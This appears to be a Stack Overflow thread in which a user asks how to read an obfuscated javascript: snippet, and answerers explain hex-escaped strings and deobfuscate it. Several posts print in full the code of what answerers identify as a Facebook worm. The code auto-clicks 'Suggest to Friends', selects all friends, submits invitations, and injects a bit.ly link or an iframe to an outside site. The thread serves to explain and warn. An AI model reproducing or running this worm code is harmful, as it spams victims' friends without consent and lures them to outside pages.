Note that I am not experienced with Javascript. If a javascript code starts like this:
javascript:var _0x89f8=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x20\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x61\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x73\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3d\x31\x30\x38\x34\x36\x33\x39\x31\x32\x35\x30\x35\x33\x35\x36\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x20\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\x6e\x64\x73\x3c\x2f\x61\x3e","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73"...
Then is it compiled? If so, any way of decompiling it? If it is not compiled, then any help on how to read this type of code?
Any help would be greatly appreciated.
EDIT:
Thank you all for the kind responds. And wow, I had no idea that I would get replied this quickly, kudos to Stackoverflow.
Nevertheless, can anyone help me make this more readible than:
var _0x89f8=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C",
"\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x64\x64",
"\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",
"\x3c\x61\x20\x69\x64\x3d\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3d\x22\x23\x22\x20\x61\x6a\x61\x78\x69\x66\x79\x3d\x22\x2f\x61\x6a\x61\x78\x2f\x73\x6f\x63\x69\x61\x6c\x5f\x67\x72\x61\x70\x68\x2f\x69\x6e\x76\x69\x74\x65\x5f\x64\x69\x61\x6c\x6f\x67\x2e\x70\x68\x70\x3f\x63\x6c\x61\x73\x73\x3d\x46\x61\x6e\x4d\x61\x6e\x61\x67\x65\x72\x26\x61\x6d\x70\x3b\x6e\x6f\x64\x65\x5f\x69\x64\x3d\x31\x30\x38\x34\x36\x33\x39\x31\x32\x35\x30\x35\x33\x35\x36\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x20\x70\x72\x6f\x66\x69\x6c\x65\x5f\x61\x63\x74\x69\x6f\x6e\x20\x61\x63\x74\x69\x6f\x6e\x73\x70\x72\x6f\x5f\x61\x22\x20\x72\x65\x6c\x3d\x22\x64\x69\x61\x6c\x6f\x67\x2d\x70\x6f\x73\x74\x22\x3e\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6f\x20\x46\x72\x69\x65\x6e\x64\x73\x3c\x2f\x61\x3e",
"\x73\x75\x67\x67\x65\x73\x74",
"\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73",
"\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74",
"\x63\x6C\x69\x63\x6B",
"\x69\x6E\x69\x74\x45\x76\x65\x6E\x74",
"\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74",
"\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C",
"\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D",
"\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70",
"\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
void ( document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]=_0x89f8[3] );
var ss=document[_0x89f8[2]](_0x89f8[4]);
var c=document[_0x89f8[6]](_0x89f8[5]);
c[_0x89f8[8]](_0x89f8[7],true,true);
void (ss[_0x89f8[9]](c));
void (setTimeout(function (){fs[_0x89f8[10]]();} ,3000));
void (setTimeout(function (){SocialGraphManager[_0x89f8[13]](_0x89f8[11],_0x89f8[12]);} ,4000));
void (setTimeout(function(){document[_0x89f8[2]](_0x89f8[1])[_0x89f8[0]]= '\x3c\x61\x20\x68\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x62\x69\x74\x2e\x6c\x79\x2f\x38\x5a\x72\x72\x46\x4f\x22\x3e\x4f\x6e\x65\x20\x43\x6c\x69\x63\x6b\x20\x46\x65\x72\x74\x69\x6c\x69\x7a\x65\x3c\x2f\x61\x3e';} ,4500));
It's merely obfuscated. _0x89f8
is a normal variable, "\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C"
is a normal string (except with all characters written in hexadecimal: \x69
is i
and so on; it says "innerHTML"
).
This looks like obfuscated javascript - whoever put it up doesn't want it to be easily read. Without meaningful variable names, it will be difficult to understand (i.e. what does _0x89f8
mean?).
The string parameters are escaped strings - \x69
is the hex for the character i
etc...
Enter the following to your browser address bar to see how it looks:
javascript:alert("\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C");
Chances are that the function being called builds up a javascript string from the parameters and then calls eval
on them.
You'll find these on Facebook a LOT.
They're usually not this obfuscated though, and normally deal with friend invitations or something along those lines.
I hardly ever execute javascript in the address line so I never checked further into any of these.
This means I have no idea if this is malicious...
You can use this http://jsbeautifier.org/ tool to unobfuscate the code auto magically (well, at least partially)...
var _0x4249=["\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x61\x70\x70\x34\x39\x34\x39\x37\x35\x32\x38\x37\x38\x5F\x62\x6F\x64\x79","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x3C\x61\x20\x69\x64\x3D\x22\x73\x75\x67\x67\x65\x73\x74\x22\x20\x68\x72\x65\x66\x3D\x22\x23\x22\x20\x61\x6A\x61\x78\x69\x66\x79\x3D\x22\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70\x3F\x63\x6C\x61\x73\x73\x3D\x46\x61\x6E\x4D\x61\x6E\x61\x67\x65\x72\x26\x61\x6D\x70\x3B\x6E\x6F\x64\x65\x5F\x69\x64\x3D\x31\x30\x30\x37\x31\x39\x36\x37\x36\x36\x33\x38\x35\x33\x35\x22\x20\x63\x6C\x61\x73\x73\x3D\x22\x20\x70\x72\x6F\x66\x69\x6C\x65\x5F\x61\x63\x74\x69\x6F\x6E\x20\x61\x63\x74\x69\x6F\x6E\x73\x70\x72\x6F\x5F\x61\x22\x20\x72\x65\x6C\x3D\x22\x64\x69\x61\x6C\x6F\x67\x2D\x70\x6F\x73\x74\x22\x3E\x53\x75\x67\x67\x65\x73\x74\x20\x74\x6F\x20\x46\x72\x69\x65\x6E\x64\x73\x3C\x2F\x61\x3E","\x73\x75\x67\x67\x65\x73\x74","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x3C\x69\x66\x72\x61\x6D\x65\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x62\x69\x74\x2E\x6C\x79\x2F\x62\x31\x69\x37\x35\x35\x22\x20\x73\x74\x79\x6C\x65\x3D\x22\x77\x69\x64\x74\x68\x3A\x20\x36\x30\x30\x70\x78\x3B\x20\x68\x65\x69\x67\x68\x74\x3A\x20\x35\x30\x30\x70\x78\x3B\x22\x20\x66\x72\x61\x6D\x65\x62\x6F\x72\x64\x65\x72\x3D\x30\x20\x73\x63\x72\x6F\x6C\x6C\x69\x6E\x67\x3D\x22\x6E\x6F\x22\x3E\x3C\x2F\x69\x66\x72\x61\x6D\x65\x3E"];var variables=[_0x4249[0],_0x4249[1],_0x4249[2],_0x4249[3],_0x4249[4],_0x4249[5],_0x4249[6],_0x4249[7],_0x4249[8],_0x4249[9],_0x4249[10],_0x4249[11],_0x4249[12],_0x4249[13]]; void (document[variables[2]](variables[1])[variables[0]]=variables[3]);var ss=document[variables[2]](variables[4]);var c=document[variables[6]](variables[5]);c[variables[8]](variables[7],true,true); void ss[variables[9]](c); void setTimeout(function (){fs[variables[10]]();} ,4000); void setTimeout(function (){SocialGraphManager[variables[13]](variables[11],variables[12]);} ,5000); void (document[variables[2]](variables[1])[variables[0]]=_0x4249[14]);
becomes....
var variables = ['innerHTML', 'app4949752878_body', 'getElementById', '<a id="suggest" href="#" ajaxify="/ajax/social_graph/invite_dialog.php?class=FanManager&node_id=329722447896" class=" profile_action actionspro_a" rel="dialog-post">Suggest to Friends</a>', 'suggest', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog'];
void(document[variables[2]](variables[1])[variables[0]] = variables[3]);
var ss = document[variables[2]](variables[4]);
var c = document[variables[6]](variables[5]);
c[variables[8]](variables[7], true, true);
void ss[variables[9]](c);
void setTimeout(function () {
fs[variables[10]]();
}, 4000);
void setTimeout(function () {
SocialGraphManager[variables[13]](variables[11], variables[12]);
}, 5000);
void(document[variables[2]](variables[1])[variables[0]] = '<iframe src="http://sslhoster.com/pages/newps3" style="width: 798px; height: 550px;" frameborder=0 scrolling="no"></iframe>');
using default settings...
For this one in particular though I had to have access to the FB page to get ALL of the javascript (I'm digging further)...
Thankfully the Wife always asks before executing javascript in the address line (she found the javascript just this evening).
Kris
No this javascript is not compiled, the "strange" text you see is encoded text. For example
\x69 equals the letter i
It's a differant notation for normal letters and other characters (@,/ etc). And used to make text harder to read, or when using strange/unusual characters in strings for example.
The function escape() will go from i to \x69 .As where the function unescape() will go from \x69 back to the letter i.
The above code example is just an array of encoded strings.
It is an obfuscated JS code.
If something is a JS source code, it is never compiled, even if it looks unreadable.
There are many JS code obfuscators or minimizers exist.
Can you identify which program generated it?
This code appears to be part of a facebook worm.
Well, I have to admit, I was curious enough that I opened a new facebook profile to find out what this thing does...
after reading the un-obfuscated code you can determine that this script will automatically open your Friend's list, and suggest just this Facebook page to all your friends (the amount allowed, of course). Therefor sending out invitations (unknowingly) to all of your friends, which some will undoubtedly continue...
Simply put, don't copy any JavaScript lines without knowing who posted them in the first place. :)